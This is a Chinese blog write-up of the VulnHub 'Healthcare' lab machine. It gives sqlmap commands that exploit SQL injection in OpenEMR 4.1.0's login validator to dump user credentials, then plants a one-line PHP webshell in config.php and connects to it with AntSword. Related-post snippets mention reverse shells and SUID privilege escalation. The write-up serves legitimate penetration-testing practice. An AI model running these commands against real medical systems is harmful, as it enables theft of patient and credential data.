Healthcare渗透思路:

已于 2023-12-11 19:56:52 修改
阅读量547 收藏
点赞数 1
文章标签: web安全 安全
于 2022-08-04 11:42:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54105551/article/details/126156515
版权

提示:这个只是个人的一个思路,结果不一定正确,大佬勿喷

目录

        靶机下载:

        一、信息收集

        二、拿取shell

        总结

靶机下载:

https://download.vulnhub.com/healthcare/Healthcare.ova

一、信息收集

我们先用nmap看看主机的信息:

靶机IP为192.168.153.134

Kali的IP为:183.168.153.128

7ce3879a2e8e481e898c3e8d2c352281.png

我们看看他开了那些端口:

404860fae35d4db380c49a31566c123d.png

我们访问一下他的80端口

ddfd9542dbd04c06a7a03cbe2bf48a5d.png

我们用gobuster或者dirb来扫描他的子目录,能发现一个登录界面:

24883f8bb9f5435ab9224dd016501570.png

我们先试试最简单和常用的一些密码进行登录,(admin,admin),(admin,password)

(admin,admin123)等等类似于这样的账号密码进行登录试试。发现不行

我们用burp抓包看看:

d5f3cdce7c784597bd134bdd75e16505.png

 

我在看网站的左上角,是OpenEMR v4.1.0 我们在网上找了一下对应的漏洞,发现他这个页面存在SQL注入漏洞,我们用sqlmap扫一下看看他的数据库

 

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 --current-db

a152c81f42434a9ea5467122f91acdb5.png

我们发现现在用的是openemr这个数据库,我们爆破一下他的表

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 -D “openemr” --tables

8ae603c9d523444f9516e574d8ff79e0.png

在下面我们发现了user表,爆破他的字段,看看有什么内容:

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 -D “openemr” -T “user” --columns

381aa5fe1c2b45ccb737103083b2733a.png

发现有username和password两个字段,我们看看这两个字段中的内容:

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 -D "openemr" -T "users" -C "username,password" –dump

2097e568bb02457694288e3c6aa7aefd.png

由此我们可以发现admin的账号和密码:

我们试着在刚刚那个登录界面登录一下看看:

登录成功:

二、拿取shell

我们在这个地方找找看看有没有什么地方可以让我们上传一些东西:

发现:在Administration中的file文件里面,有一个config.php文件,我们可以把他的内容修改为一句话木马

9cfdb3acfd2a46618f2dffd70bda4626.png

然后我们再用蚁剑连接他:

打开蚁剑,然后添加

c7fff5a571ce4ca8aad66e3fc4bb3c91.png

保存完后就可以链接了。

总结

这个靶机我没有找到类似于flag这样的字样,不知道有没有,这个只是个人的一个思路,不一定是正确的。最后谢谢观看

 

 

Anime hacker(小白)
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Healthcare靶机总结
qq_45301512的博客
01-12 432
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到,靶机开放了21端口和80端口21端口为ftp的端口,一般遇到这种,就可以考虑ftp的匿名登录,我们可以试一下用户名anonymous,没有密码,这里登录失败那么只能根据80端口,打开网站,然后去网站入手打开网站先试试功能点,看能否找到可利用的漏洞,这里没发现漏洞点然后可以在源代码里面找找看有没有提示,这里也没有。
Vulnhub: Healthcare 1靶机
qq_43884092的博客
05-19 116
openemr4.1.0 sql注入,环境变量提权
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare 1_healthcare 靶机
最新发布
2401_84715732的博客
05-12 469
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
Healthcare靶机wp
m0_52496313的博客
08-18 278
Healthcare靶机wp
Vulnhub靶机 Healthcare
菜浪马废的博客
09-17 748
没有可利用的漏洞 扫一下目录 有注入漏洞 sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= --dbs sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr --tables sqlmap -u http://192.168.80.142/openemr//interf.
Vulnhub Healthcare靶机教程
一个努力学习网安的小牛马
10-10 191
Vulnhub靶机 Healthcare 保姆级教程 过程内容详细
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
Aluxian_的博客
10-01 1005
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)1.信息收集工具得使用2.环境变量提权,这个靶机比较简单没啥新得知识点!3.sqlmap工具的使用搜索利用反弹shell的使用🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!
healthcare靶机(openEMR管理系统SQL注入漏洞)
m0_66299232的博客
11-25 558
6.在files,有一个配置文件可以更改,那么就可以把php-reverse-shell.php(github里有)的代码复制过来。pty.spawn('/bin/bash')" //反弹交互式shell。find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件。2.查看49742.py是一个python脚本,可以利用,只需更改ip 用python3来执行。nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务。
Healthcare-dbm:稍后
03-04
【标题】:“Healthcare-dbm:稍后” 【描述】:“Healthcare-dbm:稍后”这个描述似乎是在暗示这是一个关于医疗保健数据库管理系统的项目,但具体细节并未给出。可能是由于项目的开发或更新正在进行中,因此无法...
healthcare-analytics:医疗保健分析
05-08
医疗保健分析 在过去的十年中,将数据转换为见解的能力已Swift成为所有人都非常需要的技能。 这些项目的主要目的是通过Python编程使用机器学习从医疗保健领域中提取有用的见解。 它提供了用于在医学领域进行分析的...
HealthCare-System:Sprint专案Capgemini
03-22
HealthCare-System】是一个由Capgemini实施的Sprint专案,主要聚焦于医疗行业的信息化建设。这个项目可能涉及到一系列的技术和实践,其中核心编程语言是Java,这表明整个系统构建基于Java平台,利用其稳定性和强大...
openemrV4.1.0本地靶机获取webshell.docx
06-07
仅仅用于自己学习的资料
Healthcare-Project:医疗项目解决方案
03-19
医疗项目 这是我对“美国医疗保险费用”问题的回应。 这是一个相当简单的练习,为处理数据提供了很大的范围。 我的第一种方法是确定度量标准产生成本的公式。我很不高兴(发现?),我发现尽管有些人具有相同的度量...
healthcare-api:API规格和卷曲测试
05-24
本主题聚焦于"healthcare-api",一个专门针对医疗保健领域的API,它使用REST(Representational State Transfer)架构风格设计。REST API以其简洁、灵活和可扩展性在现代Web服务中广受欢迎。下面我们将深入探讨REST ...
宝德服务器bmc默认账号密码,宝德服务器系统管理平台用户操作手册.pdf
weixin_30670053的博客
08-03 3777
宝德服务器系统管理平台用户指南 V1.0宝德服务器系统管理平台用户指南目录概述 3第一章 配置IP 地址 41.1 在BIOS 中设置管理IP 41.2 使用IE 浏览器通过IPMI 访问服务器 4第二章 IPMI 的主页 52.1 System Information 52.2 Server Health 62.3 Configuration 92.4 Remote Control 2...
SpringSecurityOAuth2(7) 账号密码登录、手机验证码登录
08-05 3575
GitHub地址 码云地址 SpringSecurity 调用流程: 首先会进入UsernamePasswordAuthenticationFilter并且设置权限为null和是否授权为false,然后进入ProviderManager查找支持UsernamepasswordAuthenti...
Healthcare
weixin_45007073的博客
12-26 457
信息收集 发现目标主机开放了ftp和web服务,并且扫描出了不允许访问的几个目录 我们分别访问这几个目录,发现只有一个目录可以正常访问,其他目录都显示404状态码 我们没发现任何有价值的信息,那么就fuzz一下路径吧,发现存在一个openemr路径,进入后发现是后台登录页面 gobuster dir -u "http://192.168.101.200" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -e
Big Data Analytics for Healthcare
07-28
以下是一些关于在医疗领域中应用大数据分析的论文: 1. "Big Data Analytics in Healthcare: Promise and Potential" by Rajeev Baliyan, et al. - 这篇论文探讨了在医疗领域中应用大数据分析的潜力和前景,包括数据收集、处理、分析和应用的方法和技术。 2. "Big Data Analytics in Healthcare: A Review" by Mirela-Catalina Smeureanu, et al. - 这篇综述性论文回顾了在医疗领域中利用大数据分析的研究和实践,包括临床决策支持、疾病预测、药物发现和个性化医疗等方面的应用。 3. "Big Data Analytics for Healthcare: A Systematic Literature Review" by Amin Jalali, et al. - 这篇论文通过系统性文献回顾的方法总结了在医疗领域中应用大数据分析的研究成果,涵盖了不同的应用场景、技术和方法。 4. "Big Data Analytics in Healthcare: Challenges and Opportunities" by Shuchismita Sengupta, et al. - 这篇论文讨论了在医疗领域中应用大数据分析面临的挑战和机遇,包括数据隐私、数据质量、算法选择和可解释性等方面的问题。 这些论文提供了关于在医疗领域中应用大数据分析的重要研究和实践成果,可作为进一步学习和探索的起点。请注意,在阅读和引用这些论文时,请遵循学术道德和版权规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值